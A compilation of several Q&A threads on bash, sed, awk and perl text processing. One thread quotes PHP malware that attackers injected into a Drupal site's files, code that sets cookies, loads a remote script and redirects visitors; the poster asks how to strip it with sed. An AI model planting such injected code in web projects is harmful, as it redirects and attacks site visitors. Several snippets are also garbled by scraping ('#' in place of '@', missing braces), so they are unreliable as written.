Replace a date string in sed with the ouput of a custom function with arguments - date

I have a bash script which echos out an html file like
this ./ > out.html In the html there are timestamps in the
following format 2019-02-24T17:02:19Z.
I wrote a function to
convert the time stamp to the time delta between the timestamp
and now.
START=$(date -d "$1" "+%s")
NOW=$(date "+%s")
STD=$(echo "($NOW-$START)/3600" | bc)
MIN=$(echo "(($NOW-$START)/60)%60" | bc)
echo "Uptime $STD h $MIN min"
Now I want to replace the timestamp with the output of my_uptime
directly in the stream. I tried this:
echo "<p>some html</p>
<p>some more html</p>" | sed -r "s/[0-9\-]+T[0-9:]+Z/$(my_uptime \0)/"
This fails because the command substitution doesn't recognize the
back reference and puts in a literal 0. Is there another way to
achieve this? Preferably directly in the stream.

... | sed -r "s/[0-9\-]+T[0-9:]+Z/$(my_uptime \0)/"
This code is attempting to pass the matched value from sed's s/// into the shell function. However, $(...) is expanded before sed even sees it.
Using sed is probably not appropriate here.
Here's a perl replacement that effectively combines your shell function and sed:
... | perl -ple '
if (/([0-9-]+T[0-9:]+Z)/) {
$s = `date -d "$1" +%s`;
$n = time;
$h = int(($n-$s)/3600);
$m = int(($n-$s)/60)%60;
$_ = "Uptime $h h $m min";
You could probably do something similar in awk.


awk on a date variable

What is working :
echo "Oct 12 2021" | awk '{print "date -d\""$1FS$2FS$3"\" +%Y%m%d"}' | bash
how could I use a variable on a bash script ?
mydate="Oct 12 2021"
awk -v dateformat= ''$mydate" '{print "date -d\""$1FS$2FS$3"\" +%Y%m%d"}'
You obviously wouldn't really use awk to call date on a single value but I assume you have something more than that in mind in your real code so this is what you asked for (call GNU date from awk using an awk variable as the date):
mydate="Oct 12 2021"
awk -v date="$mydate" 'BEGIN {
system("date -d\047" date "\047 +\047%Y%m%d\047")
or if you prefer:
awk -v date="$mydate" 'BEGIN {
cmd = "date -d\047" date "\047 +\047%Y%m%d\047"
print ( (cmd | getline line) > 0 ? line : date"=N/A" )
Don't do either of those though. It's very slow to call an external command from awk and you don't need to when all you want to do is change text from one format to another:
$ awk -v date="$mydate" 'BEGIN {
mth = (index("JanFebMarAprMayJunJulAugSepOctNovDec",d[1])+2)/3
printf "%04d%02d%02d\n", d[3], mth, d[2]
Also, if you have GNU awk it has built-in time functions so even if what you wanted to do wasn't just shuffling bits of text around you could call the internal mktime() and strftime() instead of the external date:
awk -v date="$mydate" 'BEGIN {
mth = (index("JanFebMarAprMayJunJulAugSepOctNovDec",d[1])+2)/3
secs = mktime(d[3]" "mth" "d[2]" 12 0 0")
print strftime("%Y%m%d",secs)
Your original example uses awk to prepare arguments that are then passed to the Linux date command running in bash; the date formatting is performed by the date command.
You don't need awk for this, the date command -d option is very flexible in the format it receives.
mydate="Oct 3 2021"
date -d "$mydate" +%Y%m%d
Will give you a formatted date. You can assign the result to a variable using the $() syntax - run a command and assign result
formattedDate=$(date -d "$mydate" +%Y%m%d)
echo $formattedDate

Finding multiple strings on multiple lines in file and manipulating output with bash/perl

I am trying to get the version numbers for content management systems being hosted on my server. I can do this fairly simply if the version number is stored on one line with something like this:
grep -r "\$wp_version = '" /home/
Which returns exactly what I want to stdout:
/home/$RANDOMDOMAIN/wp-includes/version.php:$wp_version = '3.7.1';
The issue I run into is when I start looking for version numbers that are stored on two or more lines, like Joomla! or Magento which use the following formats respectively:
/** #var string Release version. */
public $RELEASE = '3.2';
/** #var string Maintenance version. */
public $DEV_LEVEL = '3';
'major' => '1',
'minor' => '8',
'revision' => '1',
'patch' => '0',
I have gotten it to 'work', in a way, using the following (With this method if, for whatever reason, one of the strings I am looking for is missing the whole command becomes useless since xargs -l3 is expecting 2 rows above the path provided by -print):
find /home/ -type f -name version.php -exec grep " \$RELEASE " '{}' \; -exec grep " \$DEV_LEVEL " '{}' \; -print | xargs -l3 | sed 's/\<var\>\s//g;s/\<public\>\s//g' | awk -F\; '{print $3":"$1""$2}' | sed 's/ $DEV_LEVEL = /./g'
Which get's me output like this:
/home/$RANDOMDOMAIN/version.php:$RELEASE = 3.2.3
/home/$RANDOMDOMAIN/anotherfolder/version.php:$RELEASE = 1.5.0
I also have a working for loop that WILL exclude any file that does not contain both strings, but depending how much it has to sift through, can take significantly longer than the find one liner above:
for path in $(grep -rl " \$RELEASE " /home/ 2> /dev/null | xargs grep -rl " \$DEV_LEVEL ")
joomlaver+=$(grep " \$RELEASE " $path)
joomlaver+=$(echo " \$DEV_LEVEL = '$(grep " \$DEV_LEVEL " $path | cut -d\' -f2)';")
echo "$joomlaver" | sed 's/\<var\>\s//g;s/\<public\>\s//g;s/;//g' | awk -F\' '{ print $1""$2"."$4 }' | sed 's/\s\+//g'
unset joomlaver
Which get's me output like this:
But I have to believe there is a simpler, shorter, more elegant way. Bash is preferred or if it can somehow be done with a perl one liner, that would work as well. Any and all help would be much appreciated. Thanks in advance. (Sorry for all the edits, but I am trying to figure this out myself as well!)
Here is a perl one-liner that will extract the $RELEASE and $DEV_LEVEL from the php file format you showed:
perl -ne '$v=$1 if /\$RELEASE\s*=\s*\047([0-9.]+)\047/; $devlevel=$1 if /\$DEV_LEVEL\s*=\s*\047([0-9.]+)\047/; if (defined $v && defined $devlevel) { print "$ARGV: Release=$v Devlevel=$devlevel\n"; last; }'
The -n makes perl effectivly wrap the whole thing inside a while (<>) { } loop. Each line is checked against two regexes. If both of them have matched then it will print the result and exit.
The \047 is used to match single quotes, otherwise the shell would get confused.
If it does not find a match, it does not print anything. Otherwise it prints something like this:
sample.php: Release=3.2 Devlevel=3
You would use it in combination with find and xargs to traverse down a directory structure, perhaps like this:
find . -name "*.php" | xargs perl -ne '$v=$1 if /\$RELEASE\s*=\s*\047([0-9.]+)\047/; $devlevel=$1 if /\$DEV_LEVEL\s*=\s*\047([0-9.]+)\047/; if (defined $v && defined $devlevel) { print "$ARGV: Release=$v Devlevel=$devlevel\n"; last; }'
You could make a similar version for the other file format (Magento?) you mentioned.

Insert a string/number into a specific cell of a csv file

Basically right now I have a for loop running that runs a series of tests. Once the tests pass I input the results into a csv file:
for (( some statement ))
if[[ something ]]
input this value into a specific row and column
What I can't figure out right now is how to input a specific value into a specific cell in the csv file. I know in awk you can read a cell with this command:
awk -v "row=2" -F'#' 'NR == row { print $2 }' some.csv and this will print the cell in the 2nd row and 2nd column. I need something similar to this except it can input a value into a specific cell instead of read it. Is there a function that does this?
You can use the following:
awk -v value=$value -v row=$row -v col=$col 'BEGIN{FS=OFS="#"} NR==row {$col=value}1' file
And set the bash values $value, $row and $col. Then you can redirect and move to the original:
awk ... file > new_file && mv new_file file
This && means that just if the first command (awk...) is executed successfully, then the second one will be performed.
-v value=$value -v row=$row -v col=$col pass the bash variables to awk. Note value, row and col could be other names, I just used the same as bash to make it easier to understand.
BEGIN{FS=OFS="#"} set the Field Separator and Output Field Separator to be #. The OFS="#" is not necessary here, but can be useful in case you do some print.
NR==row {$col=value} when the number of record (number of line here) is equal to row, then set the col column with value value.
1 perform the default awk action: {print $0}.
$ cat a
$ row=2
$ col=3
$ value="XXX"
$ awk -v value=$value -v row=$row -v col=$col 'BEGIN{FS=OFS="#"} NR==row {$col=value}1' a
Your question has a 'perl' tag so here is a way to do it using Tie::Array::CSV which allows you to treat the CSV file as an array of arrays and use standard array operations:
use strict;
use warnings;
use Tie::Array::CSV;
my $row = 2;
my $col = 3;
my $value = 'value';
my $filename = '/path/to/file.csv';
tie my #file, 'Tie::Array::CSV', $filename, sep_char => '#';
$file[$row][$col] = $value;
untie #file;
using sed
row=2 # define the row number
col=3 # define the column number
value="value" # define the value you need change.
sed "$row s/[^#]\{1,\}/$value/$col" file.csv # use shell variable in sed to find row number first, then replace any word between #, and only replace the nominate column.
# So above sed command is converted to sed "2 s/[^#]\{1,\}/value/3" file.csv
If the above command is fine, and your sed command support the option -i, then run the command to change the content directly in file.csv
sed -i "$row s/[^#]\{1,\}/$value/$col" file.csv
Otherwise, you need export to temp file, and change the name back.
sed "$row s/[^#]\{1,\}/$value/$col" file.csv > temp.csv
mv temp.csv file.csv

sed, replace first line

I got hacked by running a really outdated Drupal installation (shame on me)
It seems they injected the following in every .php file;
<?php global $sessdt_o; if(!$sessdt_o) {
$sessdt_o = 1; $sessdt_k = "lb11";
if(!#$_COOKIE[$sessdt_k]) {
$sessdt_f = "102";
if(!#headers_sent()) { #setcookie($sessdt_k,$sessdt_f); }
else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; }
else {
if($_COOKIE[$sessdt_k]=="102") {
$sessdt_f = (rand(1000,9000)+1);
if(!#headers_sent()) {
#setcookie($sessdt_k,$sessdt_f); }
else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; }
$sessdt_v = urlencode(strrev($sessdt_j));
$sessdt_u = "".$sessdt_f.substr($sessdt_v,-200);
echo "<script src='$sessdt_u'></script>";
echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--";
$sessdt_p = "showimg";
Can I remove and replace this with sed? e.g.:
find . -name *.php | xargs ...
I hope to have the site working just for the time being to use wget and made a static copy.
You can use sed with something like
sed '1 s/^.*$/<?php/'
The 1 part only replaces the first line. Then, thanks to the s command, it replaces the whole line by <?php.
To modify your files in-place, use the -i option of GNU sed.
To replace the first line of a file, you can use the c (for "change") command of sed:
sed '1c<?php'
which translates to: "on line 1, replace the pattern space with <?php".
For this particular problem, however, something like this would probably work:
sed '1,/^$/c<?php'
which reads: change the range "line 1 to the first empty line" to <?php, thus replacing all injected code.
(The second part of the address (the regular expression /^$/) should be replaced with an expression that would actually delimit the injected code, if it is not an empty line.)
# replace only first line
printf 'a\na\na\n' | sed '1 s/a/b/'
printf 'a\na\na\n' | perl -pe '$. <= 1 && s/a/b/'
perl is needed for more complex regex,
for example regex lookaround (lookahead, lookbehind)
sample use:
patch shebang lines in script files to use /usr/bin/env
shebang line is the first line: #!/bin/bash etc
find . -type f -exec perl -p -i -e \
'$. <= 1 && s,^#!\s*(/usr)?/bin/(?!env)(.+)$,#!/usr/bin/env \2,' '{}' \;
this will replace #! /usr/bin/python3 with #!/usr/bin/env python3
to make the script more portable (nixos linux, ...)
the (?!env) (negative lookahead) prevents double-replacing
its not perfect, since #!/bin/env foo is not replaced with #!/usr/bin/env foo ...

variable for field separator in perl

In awk I can write: awk -F: 'BEGIN {OFS = FS} ...'
In Perl, what's the equivalent of FS? I'd like to write
perl -F: -lane 'BEGIN {$, = [what?]} ...'
update with an example:
echo a:b:c:d | awk -F: 'BEGIN {OFS = FS} {$2 = 42; print}'
echo a:b:c:d | perl -F: -ane 'BEGIN {$, = ":"} $F[1] = 42; print #F'
Both output a:42:c:d
I would prefer not to hard-code the : in the Perl BEGIN block, but refer to wherever the -F option saves its argument.
To sum up, what I'm looking for does not exist:
there's no variable that holds the argument for -F, and more importantly
Perl's "FS" is fundamentally a different data type (regular expression) than the "OFS" (string) -- it does not make sense to join a list of strings using a regex.
Note that the same holds true in awk: FS is a string but acts as regex:
echo a:b,c:d | awk -F'[:,]' 'BEGIN {OFS=FS} {$2=42; print}'
outputs "a[:,]42[:,]c[:,]d"
Thanks for the insight and workarounds though.
You can use perl's -s (similar to awk's -v) to pass a "FS" variable, but the split becomes manual:
echo a:b:c:d | perl -sne '
BEGIN {$, = $FS}
#F = split $FS;
$F[1] = 42;
print #F;
' -- -FS=":"
If you know the exact length of input, you could do this:
echo a:b:c:d | perl -F'(:)' -ane '$, = $F[1]; #F = #F[0,2,4,6]; $F[1] = 42; print #F'
If the input is of variable lengths, you'll need something more sophisticated than #f[0,2,4,6].
EDIT: -F seems to simply provide input to an automatic split() call, which takes a complete RE as an expression. You may be able to find something more suitable by reading the perldoc entries for split, perlre, and perlvar.
You can sort of cheat it, because perl is actually using the split function with your -F argument, and you can tell split to preserve what it splits on by including capturing parens in the regex:
$ echo a:b:c:d | perl -F'(:)' -ane 'print join("/", #F);'
You can see what perl's doing with some of these "magic" command-line arguments by using -MO=Deparse, like this:
$ perl -MO=Deparse -F'(:)' -ane 'print join("/", #F);'
LINE: while (defined($_ = <ARGV>)) {
our(#F) = split(/(:)/, $_, 0);
print join('/', #F);
-e syntax OK
You'd have to change your #F subscripts to double what they'd normally be ($F[2] = 42).
The best I can do is:
echo a:b:c:d | perl -ne '$v=":";#F = split("$v"); $F[1] = 42; print join("$v", #F) . "\n";'
You don't need the -F: this way, and you're only stating the colon once. I was hoping there was someway of setting variables on the command line like you can with Awk's -v switch.
For one liners, Perl is usually not as clean as Awk, but I remember using Awk before I knew of Perl and writing 1000+ line Awk scripts.
Trying things like this made people think Awk was either named after the sound someone made when they tried to decipher such a script, or stood for AWKward.
There is no input record separator in Perl. You're basically emulating awk by using the -a and -F flags. If you really don't want to hard code the value, then why not just use an environmental variable?
$ export SPLIT=":"
$ perl -F$SPLIT -lane 'BEGIN { $, = $ENV{SPLIT}; } ...'